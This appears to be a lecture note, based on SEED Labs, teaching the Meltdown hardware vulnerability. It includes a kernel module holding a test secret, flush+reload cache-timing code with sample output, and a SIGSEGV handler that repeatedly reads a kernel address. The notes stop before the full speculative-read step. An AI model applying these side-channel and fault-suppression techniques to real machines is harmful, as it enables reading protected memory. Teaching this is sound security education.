Meltdown Attack

Meltdown is a hardware vulnerability that affected Intel x86 CPUs, IBM POWER CPUs, and some ARM-based CPUs. It allowed a malicious process to read all memory, even when it is not authorized to do so.

Meltdown affected a wide range of systems. At the time of disclosure (2018), this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM-based CPUs (mobile devices, smart TVs, printers and others), including a wide range of networking equipment.

It was disclosed in conjunction with another exploit, Spectre, with which it shares some characteristics. The Meltdown and Spectre vulnerabilities were considered "catastrophic" by security analysts. The vulnerabilities were so severe that security researchers initially believed the reports to be false.

In 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors.

For two lectures, we will show how meltdown attack works.

Acknowledgements.

The lecture notes are inspired by the SEED Labs.

Testing environments.

The attack has been tested under the following environments:

VMware Workstation 15 Player.
OS: Ubuntu 16.04.1. 64-bit (kernel version: 4.4.0-31-generic).
CPU: Intel CPU i5-6300U (released in 2015)

Setting the Context: Reading Kernel Memory?

We first create and insert a kernel module. Then, we will create an attack program that tries to read the secret data.

Creating and inserting a kernel module

First let's check the following code:


// mdown_kernel.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/uaccess.h>




static char secret[] = "Go Navy!";
static void* buf;

static int mdown_open(struct inode *inode, struct file *file)
{
   return single_open(file, NULL, PDE_DATA(inode));
}

static ssize_t mdown_read(struct file *filp, char *buffer,
                         size_t length, loff_t *offset)
{
   memcpy(buf, &secret, sizeof(secret));
   return sizeof(secret);
}


static const struct file_operations mdown_fops =
{
   .owner = THIS_MODULE,
   .open = mdown_open,
   .read = mdown_read,
   .llseek = seq_lseek,
   .release = single_release,
};

static __init int mdown_init(void)
{
   // print into the kernel message buffer
   printk("secret data address: 0x%p\n", &secret);

   buf = (char*)vmalloc(sizeof(secret));
   proc_create_data("secret_data", 0444, NULL, &mdown_fops, NULL);

   return 0;
}

static __exit void mdown_cleanup(void)
{
   remove_proc_entry("secret_data", NULL);
}

module_init(mdown_init);
module_exit(mdown_cleanup);

To compile the code, we will create Makefile as follows:

KVERS = $(shell uname -r)
obj-m += mdown_kernel.o
all:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

Now, let's compile the code.

~$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432 modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
  Building modules, stage 2.
  MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'

Then, the compiler will have created mdown_kernel.ko. We can insert this module in the kernel as follows:

~$ sudo insmod mdown_kernel.ko

Note that in mdown_init, there is a function call to printk. This can be checked by command dmesg.

~$  dmesg | grep secret
[  400.054528] secret data address: 0xffffffffc0232000

Naive trial that won't work

Let's try to read the data at address 0xffffffffc0232000.


// atk_naive.c
#include <stdio.h>

int main()
{
   printf("address: ");
   char* p;
   scanf("%p", &p);
   printf("reading address at 0x%p...\n", p);
   printf("%d %c\n", *p, *p); 

   return 0;
}

Let's compile and run the program:

~$ gcc atk_naive.c -o atk_naive
~$ ./atk_naive
address: 0xffffffffc0232000
reading address at 0x0xffffffffc0232000...
Segmentation fault (core dumped)

As expected, a normal program cannot read any data in the kernel region.

How can a normal program read kernel data? Is this even possible?

The meltdown attack answers this question affirmatively!

Interesting Puzzle

Consider code that performs the following:

Prepare an array.
Read a number (from 0 to 9) from a secret file.
change the array based on the number.
Change the array back to its original state.

In particular, consider the code on the right. Can you figure out the secret?

You can add code.
Of course, you are not allowed to read the secret file again.
Of course, you are not allowed to store the letter in some other variable.


#include <stdio.h>


int main()
{
   // 1. Prepare an array 
   char A[10*4096];
   for(int i=0; i<10; i++) 
     A[i*4096] = 1; 
	

   // 2. Read a number from a secret file
   int n;
   FILE* f = fopen("secret.txt", "r");
   fscanf(f, "%d", &n);
   fclose(f);

   // ???? code ????

   // 3. Change the array based on the number
   A[n*4096] = 2; 

   // 4. Revert the array state
   A[n*4096] = 1;
   n = -1;

   // ???? code ????
   return 0;
}

Solution to the puzzle

The idea is as follows:

The cache side-channel attack!

What is the side information that the cache leaks?

A recently access item will be residing in the cache.
If you try to access that item in the cache, you can access it fast.
If you try to access an item no in the cache, you will have a slower access time.

So, here is the code we will add:

Before changing the array, flush the cache for all potential items.
In the end, do the following:
- For each item, try accessing it and measure the access time.
The item with the minimum access time will be probably the secret number!

Here's the sample run of the code on the right.

~$ gcc sol_puzzle.c
~$ ./a.out
Access time for array[0*4096]: 184 CPU cycles
Access time for array[1*4096]: 220 CPU cycles
Access time for array[2*4096]: 194 CPU cycles
Access time for array[3*4096]: 218 CPU cycles
Access time for array[4*4096]: 218 CPU cycles
Access time for array[5*4096]: 212 CPU cycles
Access time for array[6*4096]: 36 CPU cycles
Access time for array[7*4096]: 222 CPU cycles
Access time for array[8*4096]: 194 CPU cycles
Access time for array[9*4096]: 218 CPU cycles
~$ cat secret.txt
6

The access time for item 6 has the minimum access time, which matches the secret number!


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <emmintrin.h>
#include <x86intrin.h>

int main()
{
   // 1. Prepare an array 
   char A[10*4096];
   for(int i=0; i<10; i++) 
     A[i*4096] = 1; 

   // 2. Read a number from a secret file
   int n;
   FILE* f = fopen("secret.txt", "r");
   fscanf(f, "%d", &n);
   fclose(f);

   // *********** Flush the cache for every element *********
   for(int i=0; i<10; i++) 
     _mm_clflush(&A[i*4096]);

   // 3. Change the array based on the number. 
   A[n*4096] = 2; 

   // 4. Revert the array state
   A[n*4096] = 1;
   n = -1;

   // **** Measure access time for each possibility ****
   char* addr;
   int dummy; 
   register uint64_t time1, time2;
  
   for(int i=0; i<10; i++) {
    addr = &A[i*4096];
    time1 = __rdtscp(&dummy);                
    dummy = *addr;
    time2 = __rdtscp(&dummy);       
    printf("Access time for array[%d*4096]: %lu CPU cycles\n",
       i, time2-time1);
  }
 
   return 0;
}

Of course, it's not at all clear at this moment how to take advantage of the cache side-channel. But, at least, this is a good direction. We will revisit this idea and develop into the actual attack in the next lecture.

Making the Probing Program Avoid Crashing

Another problem that we have to deal with is that our probing program just dies. This is because the program gets the signal SIGSEGV (segmentation fault signal). By handling this signal, we can make the program move on without crashing.

Signal handler and `sigaction()`

The function sigaction() allows the programmer to specify a signal handler for a given signal, but it also enables the programmer.

The decleration of sigaction() is as follows:


int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

The first argument is the signal to be handled, while the second and third arguments are references to a struct sigaction. It is in the struct sigaction that we set the handler function and additional arguments. It has the following members:


struct sigaction {
  void     (*sa_handler)(int);
  void     (*sa_sigaction)(int, siginfo_t *, void *);
  sigset_t   sa_mask;
  int        sa_flags;
};

The first two fields, sa_handler and sa_sigaction are function references to signal handlers; sa_handler has the same type as the handlers we've been using previously, and we can now write a simple hello world program with sigaction().

We will going to use SA_NODEFER. See the following from the man-page:

SA_NODEFER

...a further instance of the signal may be delivered to the thread while it is executing the handler...

In particular, we will do something like the following:

Access to the kernel data → SIGSEGV
- Inside a handler function due to the signal.
- In the handler, access to the kernel data → SIGSEGV
  - Inside a handler function due to the signal.
  - In the handler, access to the kernel data → SIGSEGV
    - Inside a handler function due to the signal.
    - ...

Why do we need this? It is because the access time is a noisy measure. To get better accuracy in estimation, we need to measure the access time in many iterations. In the code below, we will control the number iterations by using a global variable trial.

Modified code

Now, let's modify the program atk_naive.c. The following program will access the kernel data 20 times and then finish normally.


// atk_repeat.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/signal.h>

int trial = 0;
char* p;

void try()
{
  trial++;
  printf("reading address at 0x%p...\n", p);
  printf("%d %c\n", *p, *p); 
}

void catch_segv(int signum)
{
  if( trial < 5)
    try();
  else
    exit(0); // now it's time to end the program
}


int main()
{
   printf("address: ");
   scanf("%p", &p);

   struct sigaction action;
   action.sa_flags = SA_NODEFER;
   action.sa_handler = catch_segv;
   sigaction(SIGSEGV, &action, NULL);

   try();
   return 0;
}

To make things simpler, the code uses global variables:

trial: This keeps track of how many trials have been attempted so far.
p: The address that the user provides.

The function try() will try to access a kernel region. It will certainly create a SIGSEGV signal.

Due to the sigaction call in the main() function, the SIGSEGV signal will be handled by catch_segv(). As explained above, this procedure will be repeated recursively until trial becomes large enough.

The sample run is shown below:

~$ ./atk_repeat
address: 0xffffffffc0232000
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...